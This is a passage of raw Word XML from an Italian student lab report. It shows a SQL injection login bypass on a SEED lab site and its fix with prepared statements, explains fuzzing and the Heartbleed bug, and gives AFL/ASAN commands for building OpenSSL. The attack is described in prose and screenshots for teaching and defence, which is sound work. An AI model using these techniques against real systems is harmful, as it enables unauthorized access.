        <w:t xml:space="preserve">sito </w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidR="00B534CE" w:rsidRPr="00A719F2">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>http://www.seedlabsqlinjection.com/defense/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B534CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA3B72">
        <w:t xml:space="preserve">restituisce le informazioni relativi </w:t>
      </w:r>
      <w:r w:rsidR="00365B6E">
        <w:t xml:space="preserve">agli utenti inserendo il relativo username e password. Tale procedura è però vulnerabile </w:t>
      </w:r>
      <w:r w:rsidR="00F035C7">
        <w:t>all’ SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB7D8F8" w14:textId="77777777" w:rsidR="00140B3D" w:rsidRDefault="00F035C7" w:rsidP="00140B3D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="640553B3" wp14:editId="4091DDAA">
            <wp:extent cx="2783500" cy="1359877"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1484904631" name="Immagine 5" descr="Immagine che contiene schermata, testo, software, Software multimediale&#10;&#10;Descrizione generata automaticament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4631" name="Immagine 5" descr="Immagine che contiene schermata, testo, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId61"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId62"/>
                    <a:srcRect l="34309" t="15366" r="31026" b="54526"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2795389" cy="1365685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E7C06B" w14:textId="2A098A48" w:rsidR="00C55181" w:rsidRDefault="00140B3D" w:rsidP="00140B3D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Andando infatti </w:t>
      </w:r>
      <w:r w:rsidR="00BD4DD1">
        <w:t>ad inserire come username alice ma commentando il resto della query si evita il controllo della password e si accede ai dati</w:t>
      </w:r>
      <w:r w:rsidR="00C55181">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF0D450" w14:textId="77777777" w:rsidR="00C55181" w:rsidRDefault="00F035C7" w:rsidP="00C55181">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F027CF2" wp14:editId="243E5479">
            <wp:extent cx="3736543" cy="1119554"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="135455791" name="Immagine 6" descr="Immagine che contiene schermata, software, testo, Software multimediale&#10;&#10;Descrizione generata automaticament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791" name="Immagine 6" descr="Immagine che contiene schermata, software, testo, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId63"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId64"/>
                    <a:srcRect l="12175" t="4862" r="41612" b="70522"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3756866" cy="1125643"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D6C7A2" w14:textId="464B973D" w:rsidR="00771688" w:rsidRPr="003F10F1" w:rsidRDefault="00771688" w:rsidP="00771688">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Andiamo quindi a risolvere tale vulnerabilità utilizzando i prepared statement</w:t>
      </w:r>
      <w:r w:rsidR="003F10F1">
        <w:t xml:space="preserve"> nel file : </w:t>
      </w:r>
      <w:hyperlink r:id="rId65" w:history="1">
        <w:r w:rsidR="003F10F1" w:rsidRPr="003F10F1">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>unsafe.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7224D550" w14:textId="6BB0C346" w:rsidR="00C55181" w:rsidRDefault="00C55181" w:rsidP="00C55181">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77404F3C" wp14:editId="36F18ED0">
            <wp:extent cx="4208322" cy="3114156"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1985368496" name="Immagine 9" descr="Immagine che contiene software, schermata, testo, Software multimediale&#10;&#10;Descrizione generata automa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8496" name="Immagine 9" descr="Immagine che contiene software, schermata, testo, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId66"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId67"/>
                    <a:srcRect l="14729" t="35437" r="49984" b="18140"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4226619" cy="3127696"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC0C186" w14:textId="77777777" w:rsidR="00823D99" w:rsidRDefault="00823D99" w:rsidP="00823D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206CB7F0" w14:textId="2F912044" w:rsidR="00823D99" w:rsidRDefault="00823D99" w:rsidP="00823D99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Verifichiamo quindi il corretto funzionamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F89C076" w14:textId="7E01CD6B" w:rsidR="00F035C7" w:rsidRDefault="00F035C7" w:rsidP="00C55181">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6474092F" wp14:editId="545566B0">
            <wp:extent cx="3016524" cy="1107831"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1440638327" name="Immagine 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38327" name="Immagine 7" descr="Immagine che contiene schermata, testo, software, Software multimediale&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId68"/>
                    <a:srcRect l="32814" t="17094" r="31646" b="59702"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3042962" cy="11175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F96BE7" wp14:editId="01E57310">
            <wp:extent cx="2924908" cy="1102326"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1211090950" name="Immagine 8"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0950" name="Immagine 8" descr="Immagine che contiene schermata, software, testo, Software multimediale&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId69"/>
                    <a:srcRect l="27429" t="12544" r="34995" b="68952"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3084878" cy="1162615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C10974C" w14:textId="0A7E2D5C" w:rsidR="0098284A" w:rsidRDefault="0098284A" w:rsidP="00B05286">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Il server non restituisce i dati dell’utente se non si inserisce la password corretta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259ECA96" w14:textId="61AB4163" w:rsidR="00DC4554" w:rsidRDefault="00DC4554">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFD319C" w14:textId="4A5F2654" w:rsidR="00DC4554" w:rsidRDefault="007015E9" w:rsidP="007015E9">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="600"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc140165787"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="008F5104">
        <w:t>Fuzzing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="59CC1788" w14:textId="19CD1E7C" w:rsidR="00D92B79" w:rsidRDefault="00D92B79" w:rsidP="00D62B90">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Il fuzzing è una tecnica di test di sicurezza software che consiste nell'inserimento automatico di dati casuali o semi-validi</w:t>
      </w:r>
      <w:r w:rsidR="005B59C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>in un'applicazione al fine di individuare errori, bug e vulnerabilità. Questo approccio si basa sull'idea che l'introduzione di input inaspettati o non validi possa esporre debolezze nascoste nel codice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB5D76F" w14:textId="5D2B5FEA" w:rsidR="00D92B79" w:rsidRDefault="00D92B79" w:rsidP="00D62B90">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Il processo di fuzzing inizia generando input fuzzati casualmente o seguendo pattern specifici, come ad esempio l'inversione dell'ordine dei byte o l'inserimento di caratteri speciali. Questi input fuzzati vengono quindi inviati all'applicazione da testare, che può essere un programma, una libreria o un componente di un sistema più ampio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B50350" w14:textId="69AABA6F" w:rsidR="00D92B79" w:rsidRDefault="00D92B79" w:rsidP="00D62B90">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>L'obiettivo principale del fuzzing è individuare errori e comportamenti anomali che potrebbero essere sfruttati da attacchi esterni per compromettere la sicurezza del sistema. Ad esempio, un input fuzzato potrebbe causare un crash dell'applicazione o generare una risposta inattesa. Questi segnali indicano la presenza di bug o vulnerabilità che potrebbero essere sfruttati per eseguire codice malevolo o ottenere accesso non autorizzato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20196D95" w14:textId="030249A8" w:rsidR="00D92B79" w:rsidRDefault="00D92B79" w:rsidP="00D62B90">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Esistono diversi approcci al fuzzing, tra cui:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78231749" w14:textId="13AC48CA" w:rsidR="00D92B79" w:rsidRDefault="00D92B79" w:rsidP="00D62B90">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>basato su mutazione: questa tecnica modifica gli input esistenti in modo casuale o basato su regole per creare nuovi input fuzzati</w:t>
      </w:r>
      <w:r w:rsidR="00C27294">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DD9725" w14:textId="35108731" w:rsidR="00D92B79" w:rsidRDefault="00D92B79" w:rsidP="00D62B90">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>basato su generazione</w:t>
      </w:r>
      <w:r w:rsidR="0082475E">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>gli input fuzzati vengono generati utilizzando modelli matematici o grammatiche che definiscono la struttura degli input validi. Ciò consente di creare input fuzzati più intelligenti e potenzialmente più efficaci nel rilevare vulnerabilità specifiche.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FC453A" w14:textId="656C5831" w:rsidR="00C27294" w:rsidRDefault="00D92B79" w:rsidP="00D62B90">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>guidato da feedback: questa tecnica si basa sull'analisi delle risposte dell'applicazione agli input fuzzati. Se l'applicazione genera un crash o una risposta anomala, viene considerato un segnale di vulnerabilità potenziale. Il fuzzing guidato da feedback concentra quindi gli sforzi sugli input che hanno maggiori probabilità di rivelare problemi di sicurezza.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5963040A" w14:textId="018DB415" w:rsidR="00AB1C2A" w:rsidRDefault="00AB1C2A" w:rsidP="00AB46F3"/>
    <w:p w14:paraId="34422E45" w14:textId="77777777" w:rsidR="00AB1C2A" w:rsidRDefault="00AB1C2A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6069645C" w14:textId="16EE4BA1" w:rsidR="00247B80" w:rsidRDefault="00D976B7" w:rsidP="00D976B7">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc140165788"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00F85EFC">
        <w:t>Introduzione p</w:t>
      </w:r>
      <w:r w:rsidR="00082B8C">
        <w:t>rotocollo H</w:t>
      </w:r>
      <w:r w:rsidR="00082B8C" w:rsidRPr="00082B8C">
        <w:t>eartbeat</w:t>
      </w:r>
      <w:r w:rsidR="003E723E">
        <w:t xml:space="preserve"> e bug</w:t>
      </w:r>
      <w:r w:rsidR="00082B8C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>He</w:t>
      </w:r>
      <w:r w:rsidR="000E5153">
        <w:t>artbleed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidR="000E5153">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED6B06" w14:textId="6BD22AD8" w:rsidR="00103182" w:rsidRDefault="00103182" w:rsidP="00103182">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Il protocollo Heartbeat (o "Heartbeat extension") è un'estensione del protocollo SSL/TLS (Secure Sockets Layer/Transport Layer Security) utilizzato per crittografare le comunicazioni su Internet. Il suo obiettivo principale è consentire ai dispositivi di verificare la disponibilità e la connessione con l'altro estremo della comunicazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699A5F05" w14:textId="3AF10EA2" w:rsidR="00103182" w:rsidRDefault="00103182" w:rsidP="00103182">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>L'estensione Heartbeat consente a un dispositivo di inviare un messaggio di "heartbeat" all'altro dispositivo per verificare se è ancora attivo e in ascolto. Questo messaggio di heartbeat contiene un payload di dati e una dimensione, che l'altro dispositivo deve rispondere esattamente con lo stesso payload e dimensione. Questo meccanismo consente di mantenere attive le connessioni crittografate e di evitare timeout inutili.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B265C89" w14:textId="0E4A43AC" w:rsidR="00103182" w:rsidRDefault="00103182" w:rsidP="00103182">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tuttavia, nel 2014 è stato scoperto un grave bug di sicurezza noto come "Heartbleed". Questo bug riguarda la gestione del protocollo Heartbeat all'interno della libreria di crittografia OpenSSL, una delle librerie crittografiche più popolari utilizzate in numerosi servizi web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D4F68B" w14:textId="77777777" w:rsidR="005B285B" w:rsidRDefault="00103182" w:rsidP="00103182">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il bug Heartbleed consente a un attaccante di sfruttare un errore di programmazione nella gestione dei messaggi di heartbeat per ottenere la lettura di memoria oltre i limiti consentiti. In pratica, un attaccante può inviare una richiesta heartbeat contenente un payload di dimensione falsificata, inducendo il server OpenSSL a restituire una risposta con dati sensibili presenti nella memoria del server, come chiavi di crittografia, informazioni di autenticazione o contenuti di sessioni passate. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B8DE28" w14:textId="77777777" w:rsidR="0063658B" w:rsidRDefault="00A413C5" w:rsidP="00A413C5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C62DDF6" wp14:editId="29E9E625">
            <wp:extent cx="6837660" cy="4055165"/>
            <wp:effectExtent l="0" t="0" r="1905" b="2540"/>
            <wp:docPr id="852670244"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70244" name="Immagine 2" descr="Immagine che contiene testo, schermata, diagramma, Parallel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0348" cy="4056759"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A892DA" w14:textId="11BA5E20" w:rsidR="0063658B" w:rsidRDefault="0063658B" w:rsidP="0063658B">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc140165789"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r w:rsidR="00BE4DBA" w:rsidRPr="00BE4DBA">
        <w:t>Challenge: Fuzzing OpenSSL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="076F14B8" w14:textId="77777777" w:rsidR="009077C7" w:rsidRDefault="00A93A07" w:rsidP="00BE4DBA">
      <w:r>
        <w:t xml:space="preserve">Compiliamo la libreria </w:t>
      </w:r>
      <w:r w:rsidR="00383F9C">
        <w:t>OpenSSL abilitando</w:t>
      </w:r>
      <w:r w:rsidR="009077C7">
        <w:t xml:space="preserve"> anche ASAN utilizzando i seguenti comandi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B58D123" w14:textId="77777777" w:rsidR="002F7F39" w:rsidRPr="00D4408D" w:rsidRDefault="002F7F39">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1258"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4408D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. CC=afl-gcc CXX=afl-g++ ./config -d -g -</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4408D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4408D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-shared</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067FAC53" w14:textId="200CC773" w:rsidR="00D4408D" w:rsidRPr="00D4408D" w:rsidRDefault="002F7F39" w:rsidP="00D4408D">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1258"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4408D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2. AFL_USE_ASAN=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4408D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4408D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> make build_libs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0242510E" w14:textId="77777777" w:rsidR="00871778" w:rsidRDefault="00871778" w:rsidP="00D4408D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C47B70E" w14:textId="78CD97B7" w:rsidR="00D4408D" w:rsidRDefault="00D4408D" w:rsidP="00D4408D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D769949" wp14:editId="6AB84AC5">
            <wp:extent cx="5114290" cy="2613804"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2078382721" name="Immagine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721" name="Immagine 3">
                      <a:hlinkClick r:id="rId71"/>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l="4315" t="5312" r="49104" b="52353"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5204541" cy="2659929"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BDBC9C" w14:textId="77777777" w:rsidR="00871778" w:rsidRDefault="00D4408D" w:rsidP="00D4408D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7106A8AA" wp14:editId="6E4D00A8">
            <wp:extent cx="5628441" cy="2587925"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="457533508" name="Immagin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3508" name="Immagine 4">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l="4807" t="5775" r="43505" b="51961"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5699740" cy="2620708"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5F1BBF" w14:textId="77777777" w:rsidR="001D3758" w:rsidRDefault="00CE4444" w:rsidP="00871778">
      <w:r>
        <w:t xml:space="preserve">Creiamo </w:t>
      </w:r>
      <w:r w:rsidR="00EA018C">
        <w:t xml:space="preserve">il programma di “test harness” chiamato </w:t>
      </w:r>
      <w:r w:rsidR="00DE6959">
        <w:t>handshake.cc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB30C56" w14:textId="77777777" w:rsidR="00A80F42" w:rsidRDefault="00A80F42" w:rsidP="00871778">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295A90D3" w14:textId="0224252E" w:rsidR="0063658B" w:rsidRDefault="00A80F42" w:rsidP="007A752A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7587EC0C" wp14:editId="2F8297EC">
            <wp:extent cx="3574211" cy="4887072"/>
            <wp:effectExtent l="152400" t="152400" r="369570" b="370840"/>
            <wp:docPr id="857484650" name="Immagine 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4650" name="Immagine 5">
                      <a:hlinkClick r:id="rId75"/>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l="14288" t="8547" r="56362" b="20088"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3601353" cy="4924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4E0AAC" w14:textId="77777777" w:rsidR="008C1B62" w:rsidRPr="008C1B62" w:rsidRDefault="008C1B62" w:rsidP="008C1B62">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="2" w:color="888888"/>
          <w:left w:val="single" w:sz="6" w:space="2" w:color="888888"/>
          <w:bottom w:val="single" w:sz="6" w:space="1"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461644"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
